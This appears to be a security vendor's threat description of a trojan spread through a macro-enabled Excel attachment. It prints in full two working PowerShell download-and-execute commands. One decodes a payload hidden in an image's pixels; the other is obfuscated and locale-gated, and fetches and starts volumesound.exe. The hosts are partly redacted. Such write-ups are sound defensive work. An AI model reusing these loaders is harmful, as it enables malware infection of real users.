X2KM_POWLOAD.AOOHAK

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

However, as of this writing, the said sites are inaccessible.

Arrival Details

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

• https://{BLOCKED}2.{BLOCKED}x.com/90/f1/gat2MVsK_o.png
• http://{BLOCKED}on.com/connmouse

It saves the files it downloads using the following names:

• %User Temp%\volumesound.exe

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, XP, and Server 2003, or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, and 8.)

Other Details

This Trojan does the following:

• The Microsoft Excel file contains the following fake details luring users to enable macro content:
  
• 

However, as of this writing, the said sites are inaccessible.

NOTES:
The trojan executes the following commands to run a powershell script to download and executes a file:

• sal fr New-Object;Add-Type -AssemblyName "System.Drawing";$ds=fr System.Drawing.Bitmap((fr Net.WebClient).OpenRead("https://{BLOCKED}2.{BLOCKED}x.com/90/f1/gat2MVsK_o.png"));$mk=fr Byte[] 2140;(0..4)|%{foreach($x in(0..427)){$tt=$ds.GetPixel($x,$_);$mk[$_*428+$x]=([math]::Floor(($tt.B-band15)*16)-bor($tt.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($mk[0..1907]))
• ${DS}=&("{2}{0}{1}" -f'u','lture','Get-C') | &("{0}{2}{3}{1}"-f'F','List','or','mat-') -Property ('*') | &("{2}{0}{1}" -f'ut-St','ring','O') -Stream;if (${Ds} -Match "ja"){${URlS}=("{7}{2}{5}{1}{6}{0}{3}{4}" -f'on.c','ide','://','om/connmous','e','ol','r','http'),"";foreach(${uRl} in ${uRLs}){Try{.("{2}{1}{0}" -f'st','te-Ho','wri') ${uRL};${Fp} = "$env:temp\volumesound.exe";.("{0}{1}{2}{3}" -f'W','r','ite','-Host') ${FP};${wC} = &("{0}{1}{2}" -f 'New-Ob','j','ect') ("{0}{3}{2}{1}"-f'System.Net','ent','i','.WebCl');${wC}."HEAdERs".("{1}{0}"-f'd','Ad').Invoke(("{1}{0}{2}" -f'a','user-','gent'),("{12}{14}{18}{15}{16}{10}{4}{7}{8}{0}{6}{19}{3}{5}{1}{2}{9}{11}{13}{17}"-f'NT 10.0',' (K','H','eWebK','T; W','it/534.6',';','ind','ows ','TML, like ','s N','G','M','e','oz','5.0',' (Window','cko) Chrome/7.0.500.0 Safari/534.6','illa/',' us-US) Appl'));${Wc}.("{1}{0}{3}{2}" -f 'dF','Downloa','le','i').Invoke(${URL}, ${fp});.("{1}{0}{2}" -f'art','St','-Process') ${FP};break}Catch{&("{0}{2}{1}" -f 'Wri','-Host','te') ${_}."ExcepTion"."mesSAGE"}}}